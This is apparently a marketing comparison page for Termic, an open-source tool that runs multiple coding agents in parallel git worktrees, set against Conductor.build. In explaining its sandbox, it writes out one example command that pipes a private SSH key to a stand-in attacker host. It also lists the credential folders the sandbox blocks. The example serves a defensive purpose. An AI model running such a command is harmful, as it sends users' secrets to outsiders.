Termic vs Conductor.build
If you're looking for an open-source Conductor.build alternative, Termic keeps the core workflow:
multiple Claude Code agents running in parallel git worktrees.
The differences are source, platform support, the agents you can run, main checkout and multi-repo work,
and the sandbox around the process.
If you want the broader decision guide, read Best Conductor alternative.
01
AGPL source
Termic is AGPL-3.0 on GitHub. Fork it, audit it, package it, or build your own release from source.
02
More local shapes
Use a worktree when you need isolation, main checkout when you do not, and multi-repo tasks when the change spans services.
03
More agents, plus bring-your-own
Termic runs claude, codex, Grok, Antigravity, Copilot and opencode out of the box, and any other PTY-based agent in 30 seconds.
feature by feature
Comparison table
If a row is wrong, open an issue on GitHub and we'll fix it.
Source and license
Price today
Parallel agents in git worktrees
Attach an agent to the main checkout (no worktree)
Runs Claude Code
Runs Codex CLI
Runs Grok / Antigravity
Bring your own PTY agent
Auth path
Bundled provider CLIs
Per-task macOS sandbox
Platforms
Last reviewed: 2026-06-09. Conductor details based on public information from conductor.build; if anything's stale, please file an issue.
why switch
Price is not the argument today
Conductor's current FAQ says it is free for now and uses the Claude/Codex auth already saved on your machine. So the useful comparison is not "who is cheaper".
The useful comparison is whether you want AGPL source, Linux builds, more provider CLIs, main checkout sessions, multi-repo tasks and a sandbox around the agent process.
sandbox
OS-level sandbox per task
A coding agent with shell access can cat ~/.ssh/id_rsa | curl attacker.com
via prompt injection, a bad npm postinstall, or a tool-use mistake. Per-action permission prompts
do not stop that. They just slow it down. Conductor's FAQ says agents run directly on your system
without sandboxing.
Termic enforces the boundary at the OS:
- Filesystem: default-deny via macOS Seatbelt. The task dir, the CLI's own caches, and the toolchains it needs are allowed; everything else is blocked, read and write. So
~/.ssh,~/.aws,~/.gnupg,~/.netrc,~/.docker/config.json,~/.kube, Keychains, browser profiles, Mail, Messages, shell histories and your personal folders are unreachable. - Network: default-deny via an in-process Rust CONNECT proxy. A hostname allowlist (vendor APIs, GitHub, npm, PyPI, crates.io baked in; add your own per project) is the only way out. Everything else is refused at the TCP layer.
- Pinned at task creation: the agent can't disable the sandbox it was spawned in.
Inside the sandbox, the agent's per-action permission prompts auto-skip, so you stop clicking "approve" on
every ls, because the OS profile is doing the work.
multi-repo
Multi-repo tasks
A Termic task can contain multiple repos. Open api/,
web/ and infra/ together, and the agent sees all of
them in one working tree. Useful when a feature spans services, or an SDK bump touches several
consumers.
Conductor is one repo (one worktree) per workspace.
future-proof
The vendor CLIs, unmodified
Termic spawns claude, codex and
grok in PTYs. No reimplemented agent loop, no SDK wrapper. A new
slash command, model version, or tool ships in the CLI; brew upgrade
and you have it.
Wrappers (SDK harnesses, custom loops, in-house orchestrators) lag the CLI by however long it takes them to adopt the change. Termic doesn't have that surface area.
Works the other way too: if claude the CLI exists, Termic works. We can't be
deprecated out from under you.
questions
Comparison FAQ
Is Termic really an open-source Conductor.build alternative?
opencode, aider, ollama).What's the actual difference between Termic and Conductor?
Is Conductor free?
Does Termic support Codex and Grok too?
claude, codex, Grok and Antigravity are first-class. You can also register any other PTY-based CLI in 30 seconds (opencode, aider, ollama run, a custom shell script - anything).Does Termic see my prompts or send anything to a server?
Is there a sandbox?
~/.ssh, ~/.aws, Keychains, browser profiles and your personal folders; network goes through an in-process Rust CONNECT proxy with a hostname allowlist (vendor APIs plus GitHub and package registries baked in). Pinned at task creation so it can't be toggled mid-flight. Conductor's FAQ says its agents run without sandboxing.Linux and Windows?
sources
What I checked
Public Conductor docs, reviewed on 2026-06-09. No stale pricing claims, no anonymous forum lore.
Install Termic
Free, AGPL-3.0. macOS + Linux now; Windows soon.